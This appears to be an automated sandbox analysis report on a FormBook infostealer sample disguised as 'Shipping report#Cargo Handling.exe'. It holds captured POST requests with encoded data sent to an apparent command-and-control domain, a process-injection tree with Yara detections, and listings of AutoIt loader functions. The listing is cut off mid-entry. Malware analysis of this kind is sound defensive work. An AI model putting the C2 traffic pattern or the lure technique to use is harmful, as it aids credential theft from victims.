Sep 16, 2024 14:10:24.886185884 CEST	790	OUT	POST /06rp/ HTTP/1.1 Host: www.tigre777gg.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.tigre777gg.online Referer: http://www.tigre777gg.online/06rp/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 77 52 63 34 46 59 34 4a 65 36 39 4b 77 6e 49 4a 64 50 4a 7a 77 38 47 4b 66 4f 52 72 65 77 4c 4c 79 51 3d 3d Data Ascii: 3vHty=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8wRc4FY4Je69KwnIJdPJzw8GKfORrewLLyQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49751	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:27.766313076 CEST	810	OUT	POST /06rp/ HTTP/1.1 Host: www.tigre777gg.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.tigre777gg.online Referer: http://www.tigre777gg.online/06rp/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 69 35 43 4a 59 66 54 7a 32 43 70 52 44 6c 4f 4f 6d 49 75 35 6d 6d 33 30 6b 73 52 62 62 57 6a 56 38 3d Data Ascii: 3vHty=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki8i5CJYfTz2CpRDlOOmIu5mm30ksRbbWjV8=

Target ID:	0
Start time:	08:08:20
Start date:	16/09/2024
Path:	C:\Users\user\Desktop\Shipping report#Cargo Handling.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"
Imagebase:	0x90000
File size:	1'719'296 bytes
MD5 hash:	D930BDC12B0D6C17C9004C0DAC1D1F5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:08:21
Start date:	16/09/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"
Imagebase:	0x500000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:09:00
Start date:	16/09/2024
Path:	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe"
Imagebase:	0xd0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:09:02
Start date:	16/09/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x990000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:09:15
Start date:	16/09/2024
Path:	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe"
Imagebase:	0xd0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:09:33
Start date:	16/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3%
Total number of Nodes:	1647
Total number of Limit Nodes:	41

Executed Functions

Function 000942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0009430D

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

GetCurrentProcess.KERNEL32(?,0012CB64,00000000,?,?), ref: 00094422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00094429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00094454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00094466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00094474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0009447B
GetSystemInfo.KERNEL32(?,?,?), ref: 000944A0

Strings

kernel32.dll, xrefs: 0009444F
GetNativeSystemInfo, xrefs: 00094460
|O, xrefs: 000D36F8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 1eca0cb945ab58777d691229dd4bb78166f6277962950e36a57320ec9dab9695
Instruction ID: 8dd56f46272389ff713dce1c3f82c2ea37236240ba72953af740cd17760af5c2
Opcode Fuzzy Hash: 1eca0cb945ab58777d691229dd4bb78166f6277962950e36a57320ec9dab9695
Instruction Fuzzy Hash: 5CA16F6690E3C0FFCB21CB6A7C415997FE47B36360B1C5899D44393F22D2A045C9DB62

Function 000942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000950AA,?,?,00000000,00000000), ref: 000942B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000950AA,?,?,00000000,00000000), ref: 000942C9
LoadResource.KERNEL32(?,00000000,?,?,000950AA,?,?,00000000,00000000,?,?,?,?,?,?,00094F20), ref: 000D35BE
SizeofResource.KERNEL32(?,00000000,?,?,000950AA,?,?,00000000,00000000,?,?,?,?,?,?,00094F20), ref: 000D35D3
LockResource.KERNEL32(000950AA,?,?,000950AA,?,?,00000000,00000000,?,?,?,?,?,?,00094F20,?), ref: 000D35E6

Strings

SCRIPT, xrefs: 000942BF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a1d038046836a4354dfd6aa44bbd0a4dfb1d789e6fc5cb35b5ed2111222d7df9
Instruction ID: 988b3de4b76fbf2cf717caaae40991e10e1624d7b99a4ea28dd8b89ed3d7d518
Opcode Fuzzy Hash: a1d038046836a4354dfd6aa44bbd0a4dfb1d789e6fc5cb35b5ed2111222d7df9
Instruction Fuzzy Hash: B3117C70600700BFEB318B65DC48F2B7BB9EFC5B51F208169B50296690EB71D8519660

Function 000D2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00092B6B

Part of subcall function 00093A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00161418,?,00092E7F,?,?,?,00000000), ref: 00093A78

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00152224), ref: 000D2C10
ShellExecuteW.SHELL32(00000000,?,?,00152224), ref: 000D2C17

Strings

runas, xrefs: 000D2C0B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a8dc168ce30a34026d0d1575527abd1f3d3eab4bf933bb57f55ca9d12553d618
Instruction ID: eea8eb2f39f9d17ba0c61fad4ba0c5b2be7e8c5ecc4e20a513913118442d0cd7
Opcode Fuzzy Hash: a8dc168ce30a34026d0d1575527abd1f3d3eab4bf933bb57f55ca9d12553d618
Instruction Fuzzy Hash: 4511CD31208301BACF14FF60DC529EEB7E4ABA1341F48542DF592520A3CF218A4AAB52

Function 0009D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0009D807
timeGetTime.WINMM ref: 0009DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009DB28
TranslateMessage.USER32(?), ref: 0009DB7B
DispatchMessageW.USER32(?), ref: 0009DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009DB9F
Sleep.KERNEL32(0000000A), ref: 0009DBB1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 0ee2fdfe01a79ad6543b71e14b22afef4254ce1aa59b9867ba10a6b46ce174bc
Instruction ID: c8ef2286ca10a0008f0d47462d3e24f0331c3c10c5ea69a094b9b521693fe0a5
Opcode Fuzzy Hash: 0ee2fdfe01a79ad6543b71e14b22afef4254ce1aa59b9867ba10a6b46ce174bc
Instruction Fuzzy Hash: 6742F130648382EFDB38DF25C844BAEB7E5BF45304F18452EE59697292D770E894DB82

Function 00092CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00092D07
RegisterClassExW.USER32(00000030), ref: 00092D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00092D42
InitCommonControlsEx.COMCTL32(?), ref: 00092D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00092D6F
LoadIconW.USER32(000000A9), ref: 00092D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00092D94

Strings

TaskbarCreated, xrefs: 00092D37
+, xrefs: 00092CF0
AutoIt v3 GUI, xrefs: 00092D23
0, xrefs: 00092CE9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a08e204f68083937452ee23cc921f845959178c5edebe342089ca3a9c7a05de7
Instruction ID: 03734bfc42249032cb1a0c44ec9491ca81a9679916c80a4d5d0fc6873c227d95
Opcode Fuzzy Hash: a08e204f68083937452ee23cc921f845959178c5edebe342089ca3a9c7a05de7
Instruction Fuzzy Hash: EB21E0B5911218BFDB10DFA4EC89BDDBBB4FB08705F04811AF611A66A0D7B10590CF95

Function 000D065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000D039A: CreateFileW.KERNELBASE(00000000,00000000,?,000D0704,?,?,00000000,?,000D0704,00000000,0000000C), ref: 000D03B7

GetLastError.KERNEL32 ref: 000D076F
__dosmaperr.LIBCMT ref: 000D0776
GetFileType.KERNELBASE(00000000), ref: 000D0782
GetLastError.KERNEL32 ref: 000D078C
__dosmaperr.LIBCMT ref: 000D0795
CloseHandle.KERNEL32(00000000), ref: 000D07B5
CloseHandle.KERNEL32(?), ref: 000D08FF
GetLastError.KERNEL32 ref: 000D0931
__dosmaperr.LIBCMT ref: 000D0938

Strings

H, xrefs: 000D08BD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 9c76cdf81290658aebf41f3ff269e0da39b7a6a329c72c8afdd398526c445345
Instruction ID: fe979f58a9edf55f76cfe2b428db35923bdf57724760d00bdd650b2ac4abf409
Opcode Fuzzy Hash: 9c76cdf81290658aebf41f3ff269e0da39b7a6a329c72c8afdd398526c445345
Instruction Fuzzy Hash: AFA1F532A042059FDF29DF68DC51BEE7BE0AB46320F14015AF8199F392D7719D52CBA1

Function 0009344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00093A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00161418,?,00092E7F,?,?,?,00000000), ref: 00093A78

Part of subcall function 00093357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00093379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0009356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000D318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000D31CE
RegCloseKey.ADVAPI32(?), ref: 000D3210
_wcslen.LIBCMT ref: 000D3277
_wcslen.LIBCMT ref: 000D3286

Strings

\, xrefs: 000D328C
Software\AutoIt v3\AutoIt, xrefs: 00093560
Include, xrefs: 000D3184, 000D31C5
\Include\, xrefs: 00093527

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: e3d4ece6a4e43e134bb95f4a0918db29d3d81351ae8809530bd606cdc24a0bee
Instruction ID: 20a9510819b919ba2e4958a180bfa017ef5990beddc4b49f522233711c652328
Opcode Fuzzy Hash: e3d4ece6a4e43e134bb95f4a0918db29d3d81351ae8809530bd606cdc24a0bee
Instruction Fuzzy Hash: 657195719047019EC714EF65EC819AFBBE8FF99740F40442EF545932A1EB709A89CBA2

Function 00092B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00092B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00092B9D
LoadIconW.USER32(00000063), ref: 00092BB3
LoadIconW.USER32(000000A4), ref: 00092BC5
LoadIconW.USER32(000000A2), ref: 00092BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00092BEF
RegisterClassExW.USER32(?), ref: 00092C40

Part of subcall function 00092CD4: GetSysColorBrush.USER32(0000000F), ref: 00092D07
Part of subcall function 00092CD4: RegisterClassExW.USER32(00000030), ref: 00092D31
Part of subcall function 00092CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00092D42
Part of subcall function 00092CD4: InitCommonControlsEx.COMCTL32(?), ref: 00092D5F
Part of subcall function 00092CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00092D6F
Part of subcall function 00092CD4: LoadIconW.USER32(000000A9), ref: 00092D85
Part of subcall function 00092CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00092D94

Strings

0, xrefs: 00092C0F
#, xrefs: 00092C16
AutoIt v3, xrefs: 00092C2F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 23bd93fcfda63531d0c022d43bb61c73cfda20f96c0d67860eec0f38f09f000f
Instruction ID: 05837540d30ee12dc386bc012d001c295fe424d51653f9e3d4f5951bd0f1162e
Opcode Fuzzy Hash: 23bd93fcfda63531d0c022d43bb61c73cfda20f96c0d67860eec0f38f09f000f
Instruction Fuzzy Hash: 55211870E10318BBDB109FA5EC55AAD7FB4FB48B60F08002AE602A7BA0D7F14590DF90

Function 00093170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0009316A,?,?), ref: 000931D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0009316A,?,?), ref: 00093204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00093227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0009316A,?,?), ref: 00093232
CreatePopupMenu.USER32 ref: 00093246
PostQuitMessage.USER32(00000000), ref: 00093267

Strings

TaskbarCreated, xrefs: 0009322D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 145df895558310dd2f7f0d00e23394dce1c0a15f6c43cf7ec266f2fe1296d05b
Instruction ID: 4844e345a81955137de16851a63692237de08283190f89e8d4ab3da1da0763c1
